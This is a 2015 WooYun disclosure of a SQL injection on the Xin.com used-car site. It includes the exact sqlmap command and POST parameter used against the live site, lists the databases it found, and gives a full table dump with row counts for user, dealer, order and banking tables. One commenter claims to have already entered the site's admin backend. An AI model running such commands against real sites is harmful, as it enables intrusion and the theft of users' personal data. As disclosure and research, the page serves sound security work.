当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0136287

漏洞标题:优信集团旗下优信二手车主站SQL注入(大量用户及经销商信息泄漏)

相关厂商:优信互联(北京)信息技术有限公司

漏洞作者: 路人甲

提交时间:2015-08-23 14:02

修复时间:2015-10-07 14:04

公开时间:2015-10-07 14:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-23: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-10-07: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT
二十多万用户,五万多订单信息,三万多经销商!不要忽略呀

详细说明:

主站sql注入,没有什么好说的!

python sqlmap.py -u "http://www.xin.com:80/ajax/top_load/" --data="ename=nanjing" --dbms=mysql --dbs
[13:45:57] [INFO] resumed: xin
available databases [4]:
[*] car_model_partner
[*] information_schema
[*] test
[*] xin


漏洞证明:

Database: xin
+--------------------------+---------+
| Table                    | Entries |
+--------------------------+---------+
| car_pic                  | 11717581 |
| collect_pic              | 10981600 |
| stats_performance_record | 4700756 |
| cx_mode_config           | 3879558 |
| collect_remark           | 3127482 |
| car_off                  | 992151  |
| seller_remark            | 742069  |
| car                      | 732146  |
| car_detail               | 731973  |
| sms_message              | 720616  |
| car_20150811             | 692074  |
| collect_car              | 685340  |
| stats_telephone          | 396442  |
| rbac_log                 | 395443  |
| suggest_mem_count        | 383820  |
| suggest_mem_count_bak    | 383820  |
| call_data                | 309296  |
| statistics_search_day    | 303863  |
| user_favorite            | 299558  |
| ry_msg                   | 262175  |
| `user`                   | 190082  |
| finance_sub              | 176890  |
| ry_token                 | 151670  |
| check_result             | 149180  |
| user_device              | 120355  |
| feedback                 | 91536   |
| outstock_queue           | 90497   |
| finance_income           | 82478   |
| score_list               | 80555   |
| cx_mode_map_iautos       | 78143   |
| cx_mode_map_iautos_      | 77936   |
| contract_confirm         | 67687   |
| dealer_sms_message       | 65489   |
| car_pic_tag              | 63338   |
| dealer_msg               | 60385   |
| user_subscribe           | 58271   |
| xin_order                | 52985   |
| call_tel_set             | 49190   |
| car_half_remark          | 46731   |
| collect_dealer           | 32506   |
| dealer                   | 31588   |
| dealer_user              | 31499   |
| cx_mode                  | 24467   |
| yxp_cxk                  | 24147   |
| car_half_audit           | 21822   |
| bank                     | 18984   |
| car_half_detail          | 17408   |
| collect_dealer_transfer  | 16255   |
| call_data_zdh            | 15305   |
| statistics_search_total  | 13535   |
| stats_video_play         | 11087   |
| pos_data                 | 10980   |
| cx_mode_map_new          | 10175   |
| user_dealer_fav          | 8915    |
| collect_partner          | 8614    |
| sub_cars                 | 7860    |
| card_bin                 | 7631    |
| suggest                  | 6123    |
| suggest_mem              | 6123    |
| suggest_mem_bak          | 6123    |
| cx_mode_config_custom    | 5514    |
| rbac_actionrole          | 5487    |
| rbac_resrole             | 5285    |
| car_half_audit_log       | 5033    |
| report                   | 4994    |
| dealer_score             | 4040    |
| car_half_apply           | 3998    |
| car_tag_operate_log      | 3806    |
| person_credit            | 3484    |
| credit_auth              | 3481    |
| invite_code              | 2619    |
| task_count               | 2315    |
| stats_total              | 2303    |
| rbac_masterrole          | 2223    |
| stats_app                | 1860    |
| cx_series                | 1680    |
| bank_log                 | 1662    |
| rbac_master              | 1471    |
| cx_series_custom         | 1404    |
| collect_device           | 1356    |
| half_saler_car           | 1046    |
| user_comparison          | 995     |
| cx_mode_desc             | 949     |
| comment                  | 934     |
| con_market               | 793     |
| self_apply_dealer        | 791     |
| collect_revist           | 545     |
| city_all                 | 516     |
| activity_car             | 382     |
| half_saler               | 382     |
| city_che168              | 367     |
| rbac_action              | 298     |
| con_bloc                 | 292     |
| city                     | 267     |
| car_half_apply_data      | 247     |
| cx_mode_config_dict      | 238     |
| cx_make                  | 222     |
| con_qa                   | 210     |
| cx_brand                 | 157     |
| stats_day                | 156     |
| article                  | 155     |
| article_corre            | 154     |
| article_recom            | 122     |
| rbac_role                | 92      |
| work_shed                | 35      |
| city_province            | 31      |
| wfj_mernum               | 30      |
| delay_fee                | 20      |
| hot                      | 19      |
| activity                 | 16      |
| case_analyze             | 15      |
| buycar_shrewd            | 12      |
| rbac_master_login        | 10      |
| city_area                | 8       |
| `column`                 | 7       |
| tool                     | 6       |
| check_list               | 5       |
| ad_banner                | 4       |
| app_discover             | 4       |
| help                     | 4       |
| sphinx_incr_car          | 2       |
| notice                   | 1       |

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)

漏洞评价:

评论

  1. 2015-08-23 14:31 | 李叫兽就四李叫兽 ( 实习白帽子 | Rank:40 漏洞数:16 | 啦啦啦啦)

    求拜师,这些注入都怎么找到的啊?site吗?

  2. 2015-08-24 10:14 | 土夫子 ( 普通白帽子 | Rank:192 漏洞数:43 | 逆流而上,顺势而为)

    666

  3. 2015-08-24 17:07 | suolong ( 实习白帽子 | Rank:47 漏洞数:11 | 我有个野心,就是要成为世界第一的贱士!!)

    表示进来关注学习。

  4. 2015-08-25 02:55 | mango ( 核心白帽子 | Rank:1683 漏洞数:250 | 我有个2b女友!)

    我会说 我早就进后台了么

  5. 2015-09-24 21:15 | 李叫兽就四李叫兽 ( 实习白帽子 | Rank:40 漏洞数:16 | 啦啦啦啦)

    @mango 求教啊